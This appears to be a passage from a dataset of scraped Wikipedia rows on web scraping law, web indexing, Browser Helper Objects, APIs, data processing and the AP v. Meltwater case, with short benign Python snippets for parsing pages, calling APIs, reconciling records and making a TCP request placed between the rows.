Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc. in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use should be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200–300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's website during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider it in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping would be a violation of contract law. It would also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
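The web scraping row above describes both crude regular-expression matching and DOM-based parsing as extraction techniques. The sketch below shows the two styles side by side on the same fetched page, using requests, re, and BeautifulSoup; the URL is a placeholder and the patterns are deliberately simple, so treat this as an illustration of the two approaches rather than production code.

import re
import requests
from bs4 import BeautifulSoup

# Fetch a page (placeholder URL).
html = requests.get("https://example.com", timeout=10).text

# 1) Regular-expression style: quick but brittle against messy real-world HTML.
regex_links = re.findall(r'href="([^"]+)"', html)

# 2) DOM-parsing style: build a tree and query it, which is far more robust.
soup = BeautifulSoup(html, "html.parser")
dom_links = [a["href"] for a in soup.find_all("a", href=True)]
title = soup.title.get_text(strip=True) if soup.title else None

print("title:", title)
print("links via regex:", regex_links[:5])
print("links via DOM:", dom_links[:5])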
550 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_indexing | Web indexing, or Internet indexing, comprises methods for indexing the contents of a website or of the Internet as a whole. Individual websites or intranets may use a back-of-the-book index, while search engines usually use keywords and metadata to provide a more useful vocabulary for Internet or onsite searching. With the increase in the number of periodicals that have articles online, web indexing is also becoming important for periodical websites. 1 Back-of-the-book-style web indexes may be called "web site A-Z indexes". 2 The implication with "A-Z" is that there is an alphabetical browse view or interface. This interface differs from that of a browse through layers of hierarchical categories (also known as a taxonomy) which are not necessarily alphabetical, but are also found on some web sites. Although an A-Z index could be used to index multiple sites, rather than the multiple pages of a single site, this is unusual. Metadata web indexing involves assigning keywords, description or phrases to web pages or web sites within a metadata tag (or "meta-tag") field, so that the web page or web site can be retrieved with a list. This method is commonly used by search engine indexing. 3 4 |
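Metadata web indexing, as described in the row above, relies on keywords and descriptions placed in meta tags. A minimal sketch of pulling those fields into an index record is shown below; the URL is a placeholder and the record layout is just one possible choice, not a standard.

import requests
from bs4 import BeautifulSoup

# Fetch a page (placeholder URL) and collect the metadata an indexer might use.
soup = BeautifulSoup(requests.get("https://example.com", timeout=10).text, "html.parser")

record = {
    "title": soup.title.get_text(strip=True) if soup.title else None,
    "description": None,
    "keywords": [],
}
desc = soup.find("meta", attrs={"name": "description"})
if desc and desc.get("content"):
    record["description"] = desc["content"]
kw = soup.find("meta", attrs={"name": "keywords"})
if kw and kw.get("content"):
    record["keywords"] = [k.strip() for k in kw["content"].split(",")]
print(record)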
552 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Browser_Helper_Object | A Browser Helper Object (BHO) is a DLL module designed as a plugin for the Microsoft Internet Explorer web browser to provide added functionality. BHOs were introduced in October 1997 with the release of version 4 of Internet Explorer. Most BHOs are loaded once by each new instance of Internet Explorer. However, in the case of Windows Explorer, a new instance is launched for each window. BHOs are still supported as of Windows 10, through Internet Explorer 11, while BHOs are not supported in Microsoft Edge. Each time a new instance of Internet Explorer starts, it checks the Windows Registry for the key HKEY LOCAL MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer Browser Helper Objects. If Internet Explorer finds this key in the registry, it looks for a CLSID key listed below the key. The CLSID keys under Browser Helper Objects tell the browser which BHOs to load. Removing the registry key prevents the BHO from being loaded. For each CLSID that is listed below the BHO key, Internet Explorer calls CoCreateInstance to start the instance of the BHO in the same process space as the browser. If the BHO is started and implements the IObjectWithSite interface, it can control and receive events from Internet Explorer. BHOs can be created in any language that supports COM. 1 Some modules enable the display of different file formats not ordinarily interpretable by the browser. The Adobe Acrobat plug-in that allows Internet Explorer users to read PDF files within their browser is a BHO. Other modules add toolbars to Internet Explorer, such as the Alexa Toolbar that provides a list of web sites related to the one you are currently browsing, or the Google Toolbar that adds a toolbar with a Google search box to the browser user interface. The Conduit toolbars are based on a BHO that can be used on Internet Explorer 7 and up. This BHO provides a search facility that connects to Microsoft's Bing search. The BHO API exposes hooks that allow the BHO to access the Document Object Model (DOM) of the current page and to control navigation. Because BHOs have unrestricted access to the Internet Explorer event model, some forms of malware (such as adware and spyware) have also been created as BHOs. 2 3 For example, the Download.ject malware is a BHO that is activated when a secure HTTP connection is made to a financial institution, then begins to record keystrokes for the purpose of capturing user passwords. The MyWay Searchbar tracks users' browsing patterns and passes the information it records to third parties. The C2.LOP malware adds links and popups of its own to web pages in order to drive users to pay-per-click websites. citation needed Many BHOs introduce visible changes to a browser's interface, such as installing toolbars in Internet Explorer and the like, but others run without any change to the interface. This renders it easy for malicious coders to conceal the actions of their browser add-on, especially since, after being installed, the BHO seldom requires permission before performing further actions. For instance, variants of the ClSpring trojan use BHOs to install scripts to provide a number of instructions to be performed such as adding and deleting registry values and downloading additional executable files, all completely transparently to the user. 
4 In response to the problems associated with BHOs and similar extensions to Internet Explorer, Microsoft debuted an Add-on Manager in Internet Explorer 6 with the release of Service Pack 2 for Windows XP (updating it to IE6 Security Version 1, a.k.a. SP2). This utility displays a list of all installed BHOs, browser extensions and ActiveX controls, and allows the user to enable or disable them at will. There are also free tools (such as BHODemon) that list installed BHOs and allow the user to disable malicious extensions. Spybot S D advanced mode has a similar tool built in to allow the user to disable installed BHO. |
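Row 552 above explains that Internet Explorer loads BHOs by enumerating CLSID subkeys under a Browser Helper Objects registry key. Below is a Windows-only sketch using Python's standard winreg module; the key path is the one named in the scraped text with its separators restored, and the snippet is purely illustrative rather than part of the scraping pipeline.
import winreg  # standard library, Windows only

BHO_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"

def list_bho_clsids():
    # Enumerate the CLSID subkeys that tell the browser which BHOs to load.
    clsids = []
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, BHO_KEY) as key:
            index = 0
            while True:
                try:
                    clsids.append(winreg.EnumKey(key, index))
                    index += 1
                except OSError:       # no more subkeys
                    break
    except FileNotFoundError:
        pass                          # key absent: no BHOs registered
    return clsids

print(list_bho_clsids())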
553 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Application_programming_interface | An application programming interface (API) is a way for two or more computer programs or components to communicate with each other. It is a type of software interface, offering a service to other pieces of software. 1 A document or standard that describes how to build or use such a connection or interface is called an API specification. A computer system that meets this standard is said to implement or expose an API. The term API may refer either to the specification or to the implementation. Whereas a system's user interface dictates how its end-users interact with the system in question, its API dictates how to write code that takes advantage of that system's capabilities. In contrast to a user interface, which connects a computer to a person, an application programming interface connects computers or pieces of software to each other. It is not intended to be used directly by a person (the end user) other than a computer programmer who is incorporating it into the software. An API is often made up of different parts which act as tools or services that are available to the programmer. A program or a programmer that uses one of these parts is said to call that portion of the API. The calls that make up the API are also known as subroutines, methods, requests, or endpoints. An API specification defines these calls, meaning that it explains how to use or implement them. One purpose of APIs is to hide the internal details of how a system works, exposing only those parts that a programmer will find useful, and keeping them consistent even if the internal details change later. An API may be custom-built for a particular pair of systems, or it may be a shared standard allowing interoperability among many systems. There are APIs for programming languages, software libraries, computer operating systems, and computer hardware. APIs originated in the 1940s, though the term did not emerge until the 1960s and 1970s. Contemporary usage of the term API often refers to web APIs, 2 which allow communication between computers that are joined by the internet. Recent developments in APIs have led to the rise in popularity of microservices, which are loosely coupled services accessed through public APIs. 3 APIs should be versioned. There are two common versioning strategies: 4 In building applications, an API simplifies programming by abstracting the underlying implementation and only exposing objects or actions the developer needs. While a graphical interface for an email client might provide a user with a button that performs all the steps for fetching and highlighting new emails, an API for file input output might give the developer a function that copies a file from one location to another without requiring that the developer understand the file system operations occurring behind the scenes. 5 The term API initially described an interface only for end-user-facing programs, known as application programs. This origin is still reflected in the name "application programming interface. Today, the term is broader, including also utility software and even hardware interfaces. 7 The idea of the API is much older than the term itself. British computer scientists Maurice Wilkes and David Wheeler worked on a modular software library in the 1940s for EDSAC, an early computer. The subroutines in this library were stored on punched paper tape organized in a filing cabinet. 
This cabinet also contained what Wilkes and Wheeler called a "library catalog" of notes about each subroutine and how to incorporate it into a program. Today, such a catalog would be called an API (or an API specification or API documentation) because it instructs a programmer on how to use (or "call") each subroutine that the programmer needs. 7 Wilkes and Wheeler's 1951 book The Preparation of Programs for an Electronic Digital Computer contains the first published API specification. Joshua Bloch considers that Wilkes and Wheeler "latently invented" the API because it is more of a concept that is discovered than invented. 7 The term "application program interface" (without an ing suffix) is first recorded in a paper called Data structures and techniques for remote computer graphics presented at an AFIPS conference in 1968. 9 7 The authors of this paper use the term to describe the interaction of an application—a graphics program in this case—with the rest of the computer system. A consistent application interface (consisting of Fortran subroutine calls) was intended to free the programmer from dealing with idiosyncrasies of the graphics display device, and to provide hardware independence if the computer or the display were replaced. 8 The term was introduced to the field of databases by C. J. Date 10 in a 1974 paper called The Relational and Network Approaches: Comparison of the Application Programming Interface. 11 An API became a part of the ANSI SPARC framework for database management systems. This framework treated the application programming interface separately from other interfaces, such as the query interface. Database professionals in the 1970s observed these different interfaces could be combined; a sufficiently rich application interface could support the other interfaces as well. 6 This observation led to APIs that supported all types of programming, not just application programming. By 1990, the API was defined simply as "a set of services available to a programmer for performing certain tasks" by technologist Carl Malamud. 12 The idea of the API was expanded again with the dawn of remote procedure calls and web APIs. As computer networks became common in the 1970s and 1980s, programmers wanted to call libraries located not only on their local computers but on computers located elsewhere. These remote procedure calls were well supported by the Java language in particular. In the 1990s, with the spread of the internet, standards like CORBA, COM, and DCOM competed to become the most common way to expose API services. 13 Roy Fielding's dissertation Architectural Styles and the Design of Network-based Software Architectures at UC Irvine in 2000 outlined Representational state transfer (REST) and described the idea of a "network-based Application Programming Interface" that Fielding contrasted with traditional "library-based" APIs. 14 XML and JSON web APIs saw widespread commercial adoption beginning in 2000 and continuing as of 2022. The web API is now the most common meaning of the term API. 2 The Semantic Web proposed by Tim Berners-Lee in 2001 included "semantic APIs" that recasts the API as an open, distributed data interface rather than a software behavior interface. 15 Proprietary interfaces and agents became more widespread than open ones, but the idea of the API as a data interface took hold. Because web APIs are widely used to exchange data of all kinds online, API has become a broad term describing much of the communication on the internet. 
13 When used in this way, the term API has overlap in meaning with the term communication protocol. The interface to a software library is one type of API. The API describes and prescribes the "expected behavior" (a specification) while the library is an "actual implementation" of this set of rules. A single API can have multiple implementations (or none, being abstract) in the form of different libraries that share the same programming interface. The separation of the API from its implementation can allow programs written in one language to use a library written in another. For example, because Scala and Java compile to compatible bytecode, Scala developers can take advantage of any Java API. 16 API use can vary depending on the type of programming language involved. An API for a procedural language such as Lua could consist primarily of basic routines to execute code, manipulate data or handle errors while an API for an object-oriented language, such as Java, would provide a specification of classes and its class methods. 17 18 Hyrum's law states that "With a sufficient number of users of an API, it does not matter what you promise in the contract: all observable behaviors of your system will be depended on by somebody. 19 Meanwhile, several studies show that most applications that use an API tend to use a small part of the API. 20 Language bindings are also APIs. By mapping the features and capabilities of one language to an interface implemented in another language, a language binding allows a library or service written in one language to be used when developing in another language. citation needed Tools such as SWIG and F2PY, a Fortran-to-Python interface generator, facilitate the creation of such interfaces. 21 An API can also be related to a software framework: a framework can be based on several libraries implementing several APIs, but unlike the normal use of an API, the access to the behavior built into the framework is mediated by extending its content with new classes plugged into the framework itself. Moreover, the overall program flow of control can be out of the control of the caller and in the framework's hands by inversion of control or a similar mechanism. 22 23 An API can specify the interface between an application and the operating system. 24 POSIX, for example, provides a set of common API specifications that aim to enable an application written for a POSIX conformant operating system to be compiled for another POSIX conformant operating system. Linux and Berkeley Software Distribution are examples of operating systems that implement the POSIX APIs. 25 Microsoft has shown a strong commitment to a backward-compatible API, particularly within its Windows API (Win32) library, so older applications may run on newer versions of Windows using an executable-specific setting called "Compatibility Mode". 26 An API differs from an application binary interface (ABI) in that an API is source code based while an ABI is binary based. For instance, POSIX provides APIs while the Linux Standard Base provides an ABI. 27 28 Remote APIs allow developers to manipulate remote resources through protocols, specific standards for communication that allow different technologies to work together, regardless of language or platform. 
For example, the Java Database Connectivity API allows developers to query many different types of databases with the same set of functions, while the Java remote method invocation API uses the Java Remote Method Protocol to allow invocation of functions that operate remotely but appear local to the developer. 29 30 Therefore, remote APIs are useful in maintaining the object abstraction in object-oriented programming; a method call, executed locally on a proxy object, invokes the corresponding method on the remote object, using the remoting protocol, and acquires the result to be used locally as a return value. A modification of the proxy object will also result in a corresponding modification of the remote object. 31 Web APIs are a service accessed from client devices (mobile phones, laptops, etc.) to a web server using the Hypertext Transfer Protocol (HTTP). Client devices send a request in the form of an HTTP request, and are met with a response message usually in JavaScript Object Notation (JSON) or Extensible Markup Language (XML) format. Developers typically use Web APIs to query a server for a specific set of data from that server. An example might be a shipping company API that can be added to an eCommerce-focused website to facilitate ordering shipping services and automatically include current shipping rates, without the site developer having to enter the shipper's rate table into a web database. While "web API" historically has been virtually synonymous with web service, the recent trend (so-called Web 2.0) has been moving away from Simple Object Access Protocol (SOAP) based web services and service-oriented architecture (SOA) towards more direct representational state transfer (REST) style web resources and resource-oriented architecture (ROA). 32 Part of this trend is related to the Semantic Web movement toward Resource Description Framework (RDF), a concept to promote web-based ontology engineering technologies. Web APIs allow the combination of multiple APIs into new applications known as mashups. 33 In the social media space, web APIs have allowed web communities to facilitate sharing content and data between communities and applications. In this way, content that is created in one place dynamically can be posted and updated to multiple locations on the web. 34 For example, Twitter's REST API allows developers to access core Twitter data and the Search API provides methods for developers to interact with Twitter Search and trends data. 35 The design of an API has a significant impact on its usage. 5 First of all, the design of programming interfaces represents an important part of software architecture, the organization of a complex piece of software. 36 The principle of information hiding describes the role of programming interfaces as enabling modular programming by hiding the implementation details of the modules so that users of modules need not understand the complexities inside the modules. 37 Aside from the previous underlying principle, other metrics for measuring the usability of an API may include properties such as functional efficiency, overall correctness, and learnability for novices. 38 One straightforward and commonly adopted way of designing APIs is to follow Nielsen's heuristic evaluation guidelines. The Factory method pattern is also typical in designing APIs due to their reusable nature. 39 Thus, the design of an API attempts to provide only the tools a user would expect. 5 An application programming interface can be synchronous or asynchronous. 
A synchronous API call is a design pattern where the call site is blocked while waiting for the called code to finish. 40 With an asynchronous API call, however, the call site is not blocked while waiting for the called code to finish, and instead the calling thread is notified when the reply arrives. API security is very critical when developing a public facing API. Common threats include SQL injection, Denial-of-service attack (DoS), broken authentication, and exposing sensitive data. 41 Without ensuring proper security practices, bad actors can get access to information they should not have or even gain privileges to make changes to your server. Some common security practices include proper connection security using HTTPS, content security to mitigate data injection attacks, and requiring an API key to use your service. 42 Many public facing API services require you to use an assigned API key, and will refuse to serve data without sending the key with your request. 43 APIs are one of the more common ways technology companies integrate. Those that provide and use APIs are considered as being members of a business ecosystem. 44 The main policies for releasing an API are: 45 An important factor when an API becomes public is its "interface stability". Changes to the API—for example adding new parameters to a function call—could break compatibility with the clients that depend on that API. 49 When parts of a publicly presented API are subject to change and thus not stable, such parts of a particular API should be documented explicitly as "unstable". For example, in the Google Guava library, the parts that are considered unstable, and that might change soon, are marked with the Java annotation Beta. 50 A public API can sometimes declare parts of itself as deprecated or rescinded. This usually means that part of the API should be considered a candidate for being removed, or modified in a backward incompatible way. Therefore, these changes allow developers to transition away from parts of the API that will be removed or not supported in the future. 51 On February 19, 2020, Akamai published their annual "State of the Internet" report, showcasing the growing trend of cybercriminals targeting public API platforms at financial services worldwide. From December 2017 through November 2019, Akamai witnessed 85.42 billion credential violation attacks. About 20%, or 16.55 billion, were against hostnames defined as API endpoints. Of these, 473.5 million have targeted financial services sector organizations. 52 API documentation describes the services an API offers and how to use those services, aiming to cover everything a client would need to know for practical purposes. Documentation is crucial for the development and maintenance of applications using the API. 53 API documentation is traditionally found in documentation files but can also be found in social media such as blogs, forums, and Q A websites. 54 Traditional documentation files are often presented via a documentation system, such as Javadoc or Pydoc, that has a consistent appearance and structure. However, the types of content included in the documentation differ from API to API. 55 In the interest of clarity, API documentation may include a description of classes and methods in the API as well as "typical usage scenarios, code snippets, design rationales, performance discussions, and contracts", but implementation details of the API services themselves are usually omitted. 
Reference documentation for a REST API can be generated automatically from an OpenAPI document, which is a machine-readable text file that uses a prescribed format and syntax defined in the OpenAPI Specification. The OpenAPI document defines basic information such as the API's name and description, as well as describing operations the API provides access to. 56 API documentation can be enriched with metadata information like Java annotations. This metadata can be used by the compiler, tools, and by the run-time environment to implement custom behaviors or custom handling. 57 In 2010, Oracle Corporation sued Google for having distributed a new implementation of Java embedded in the Android operating system. 58 Google had not acquired any permission to reproduce the Java API, although permission had been given to the similar OpenJDK project. Google had approached Oracle to negotiate a license for their API, but were turned down due to trust issues. Despite the disagreement, Google chose to use Oracle's code anyway. Judge William Alsup ruled in the Oracle v. Google case that APIs cannot be copyrighted in the U.S and that a victory for Oracle would have widely expanded copyright protection to a "functional set of symbols" and allowed the copyrighting of simple software commands: To accept Oracle's claim would be to allow anyone to copyright one version of code to carry out a system of commands and thereby bar all others from writing its different versions to carry out all or part of the same commands. 59 60 Alsup's ruling was overturned in 2014 on appeal to the Court of Appeals for the Federal Circuit, though the question of whether such use of APIs constitutes fair use was left unresolved. 61 62 In 2016, following a two-week trial, a jury determined that Google's reimplementation of the Java API constituted fair use, but Oracle vowed to appeal the decision. 63 Oracle won on its appeal, with the Court of Appeals for the Federal Circuit ruling that Google's use of the APIs did not qualify for fair use. 64 In 2019, Google appealed to the Supreme Court of the United States over both the copyrightability and fair use rulings, and the Supreme Court granted review. 65 Due to the COVID 19 pandemic, the oral hearings in the case were delayed until October 2020. 66 The case was decided by the Supreme Court in Google's favor with a ruling of 6 2. Justice Stephen Breyer delivered the opinion of the court and at one point mentioned that "The declaring code is, if copyrightable at all, further than are most computer programs from the core of copyright. This means the code used in APIs are more similar to dictionaries than novels in terms of copyright protection. 67 |
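Row 553 above describes the web-API pattern: a client sends an HTTP request to an endpoint, often with a required API key, and receives a JSON (or XML) response. Below is a hedged sketch of that pattern with requests; the endpoint URL, the X-Api-Key header name, and the query parameters are hypothetical placeholders, not any real service's documented interface.
import requests

def call_web_api(base_url, api_key, **params):
    # Send the request with an API key; many public APIs refuse to serve data without one.
    response = requests.get(
        base_url,
        params=params,                    # query-string parameters
        headers={"X-Api-Key": api_key},   # placeholder header name
        timeout=10,
    )
    response.raise_for_status()           # surface 4xx/5xx errors
    return response.json()                # most web APIs answer in JSON

# Example usage with placeholder values:
# rates = call_web_api("https://api.example.com/v1/rates", "MY_KEY", origin="US", dest="CA")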
554 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_processing | Data processing is the collection and manipulation of digital data to produce meaningful information. 1 Data processing is a form of information processing, which is the modification (processing) of information in any manner detectable by an observer. note 1 Data processing may involve various processes, including: The United States Census Bureau history illustrates the evolution of data processing from manual through electronic procedures. Although widespread use of the term data processing dates only from the 1950s, 2 data processing functions have been performed manually for millennia. For example, bookkeeping involves functions such as posting transactions and producing reports like the balance sheet and the cash flow statement. Completely manual methods were augmented by the application of mechanical or electronic calculators. A person whose job was to perform calculations manually or using a calculator was called a "computer. The 1890 United States Census schedule was the first to gather data by individual rather than household. A number of questions could be answered by making a check in the appropriate box on the form. From 1850 to 1880 the Census Bureau employed "a system of tallying, which, by reason of the increasing number of combinations of classifications required, became increasingly complex. Only a limited number of combinations could be recorded in one tally, so it was necessary to handle the schedules 5 or 6 times, for as many independent tallies. 3 "It took over 7 years to publish the results of the 1880 census" 4 using manual processing methods. The term automatic data processing was applied to operations performed by means of unit record equipment, such as Herman Hollerith's application of punched card equipment for the 1890 United States Census. "Using Hollerith's punchcard equipment, the Census Office was able to complete tabulating most of the 1890 census data in 2 to 3 years, compared with 7 to 8 years for the 1880 census. It is estimated that using Hollerith's system saved some $5 million in processing costs" 4 in 1890 dollars even though there were twice as many questions as in 1880. Computerized data processing, or electronic data processing represents a later development, with a computer used instead of several independent pieces of equipment. The Census Bureau first made limited use of electronic computers for the 1950 United States Census, using a UNIVAC I system, 3 delivered in 1952. The term data processing has mostly been subsumed by the more general term information technology (IT). 5 The older term "data processing" is suggestive of older technologies. For example, in 1996 the Data Processing Management Association (DPMA) changed its name to the Association of Information Technology Professionals. Nevertheless, the terms are approximately synonymous. Commercial data processing involves a large volume of input data, relatively few computational operations, and a large volume of output. For example, an insurance company needs to keep records on tens or hundreds of thousands of policies, print and mail bills, and receive and post payments. In science and engineering, the terms data processing and information systems are considered too broad, and the term data processing is typically used for the initial stage followed by a data analysis in the second stage of the overall data handling. 
Data analysis uses specialized algorithms and statistical calculations that are less often observed in a typical general business environment. For data analysis, software suites like SPSS or SAS, or their free counterparts such as DAP, gretl, or PSPP are often used. These tools are usually helpful for processing various huge data sets, as they are able to handle enormous amount of statistical analysis. 6 A data processing system is a combination of machines, people, and processes that for a set of inputs produces a defined set of outputs. The inputs and outputs are interpreted as data, facts, information etc. depending on the interpreter's relation to the system. A term commonly used synonymously with data or storage (codes) processing system is information system. 7 With regard particularly to electronic data processing, the corresponding concept is referred to as electronic data processing system. A very simple example of a data processing system is the process of maintaining a check register. Transactions— checks and deposits— are recorded as they occur and the transactions are summarized to determine a current balance. Monthly the data recorded in the register is reconciled with a hopefully identical list of transactions processed by the bank. A more sophisticated record keeping system might further identify the transactions— for example deposits by source or checks by type, such as charitable contributions. This information might be used to obtain information like the total of all contributions for the year. The important thing about this example is that it is a system, in which, all transactions are recorded consistently, and the same method of bank reconciliation is used each time. This is a flowchart of a data processing system combining manual and computerized processing to handle accounts receivable, billing, and general ledger |
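Row 554 above closes with a check-register example of a data processing system: transactions are recorded, summarized into a running balance, and reconciled monthly against the bank's list. Below is a small pandas sketch of that workflow; the column names and figures are invented for illustration.
import pandas as pd

register = pd.DataFrame({
    "date":   ["2024-01-03", "2024-01-10", "2024-01-15"],
    "kind":   ["deposit", "check", "check"],
    "amount": [1000.00, -250.00, -75.50],
})
register["balance"] = register["amount"].cumsum()    # running balance after each transaction

bank = pd.DataFrame({
    "date":   ["2024-01-03", "2024-01-10"],
    "amount": [1000.00, -250.00],
})

# Reconciliation: keep register entries the bank has not (yet) processed.
merged = register.merge(bank, on=["date", "amount"], how="left", indicator=True)
outstanding = merged.loc[merged["_merge"] == "left_only", ["date", "kind", "amount"]]
print(register)
print(outstanding)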
555 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Socket_programming | Computer network programming involves writing computer programs that enable processes to communicate with each other across a computer network. 1 Very generally, most of communications can be divided into connection-oriented, and connectionless. Whether a communication is connection-oriented or connectionless, is defined by the communication protocol, and not by application programming interface (API). Examples of the connection-oriented protocols include Transmission Control Protocol (TCP) and Sequenced Packet Exchange (SPX), and examples of connectionless protocols include User Datagram Protocol (UDP), "raw IP", and Internetwork Packet Exchange (IPX). For connection-oriented communications, communication parties usually have different roles. One party is usually waiting for incoming connections; this party is usually referred to as "server". Another party is the one which initiates connection; this party is usually referred to as "client". For connectionless communications, one party ("server") is usually waiting for an incoming packet, and another party ("client") is usually understood as the one which sends an unsolicited packet to "server". Network programming traditionally covers different layers of OSI ISO model (most of application-level programming belongs to L4 and up). The table below contains some examples of popular protocols belonging to different OSI ISO layers, and popular APIs for them. |
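Row 555 above distinguishes connection-oriented protocols such as TCP from connectionless ones such as UDP, with one party waiting for connections (the server) and the other initiating them (the client). Below is a minimal connection-oriented client sketch using Python's standard socket module, which sends a plain HTTP/1.0 request and reads the reply; example.com on port 80 is only an example host.
import socket

def tcp_http_get(hostname, port=80):
    # Client role in a connection-oriented exchange: connect, send, read until close.
    with socket.create_connection((hostname, port), timeout=10) as sock:
        sock.sendall(f"GET / HTTP/1.0\r\nHost: {hostname}\r\n\r\n".encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:              # server closed the connection
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")

print(tcp_http_get("example.com")[:300])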
556 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Associated_Press_v._Meltwater_U.S._Holdings,_Inc. | Associated Press v. Meltwater U.S. Holdings, Inc. (S.D.N.Y. March 21, 2013) was a district court case in which the Associated Press (AP) brought suit against Meltwater Group in U.S. (Meltwater) for clipping and sharing news items under copyright infringement and "hot news" misappropriation under New York common law. In a cross-motion for summary judgement, Meltwater argued they were not infringing under the requirements of fair use. Meltwater claimed that their service was transformative and therefore non-infringing on copyright. The court held that Meltwater's copying was not protected under the fair use doctrine and it was infringing on AP's copyright. 1 A parallel case filed on the same grounds in the UK, however, was decided the other way in 2013 (in favor of Meltwater and against the equivalent newspaper licensing business) by the UK Supreme Court, subject to questions referred to the European Court of Justice and intended to clarify matters of a cross-border nature. The Associated Press (AP) was founded in 1846 as a not-for-profit news organization that published original content and photographs. The company received its funds from various subscribing newspaper and broadcasting companies. Licensing fees accounted for hundreds of millions of dollars in annual revenue for the Associated Press, and each contract was crafted to grant specific permissions of redistribution, clipping, etc. to each license holder. Each article was carefully sourced, researched, and edited. In addition, each article contained a lede, a concise concentration of key information, which "takes significant journalistic skill to craft. 1 The Associated Press obtained a registered copyright on some of their articles, thirty-three of which were identified to be relevant to this case (Registered Articles). In addition to licensing, AP offered numerous products including "AP Exchange, which allowed licensees to access content by searching for keywords and other metadata. 2 Meltwater was a "software as a service" or SaaS company, that in 2005 began offering news monitoring services to subscribers. 1 Meltwater electronically clipped articles and their contents verbatim using crawlers for its customers and distributes them widely. 3 The service eventually began to include stories written by AP. Meltwater's "Global Media Monitoring" product allowed its customers to search news articles by keyword. When a customer searched for information based on a string of keywords in the database, Meltwater reported back a list of articles from all over the web organized according to that query. Beneath the search result was a set of information including the headline of the article and URL, the information about the source and origin, and excerpts from that article. Subscribers to Meltwater were able to subscribe to a newsletter for their queries, searched ad hoc and archived the material if desired, etc. 1 AP and Meltwater competed for the news clipping service market for their clients through AP Exchange and Global Media Monitoring. It was not contested that through the Global Media Monitoring service, Meltwater copied content from each of the thirty-three articles registered under copyright by AP. 
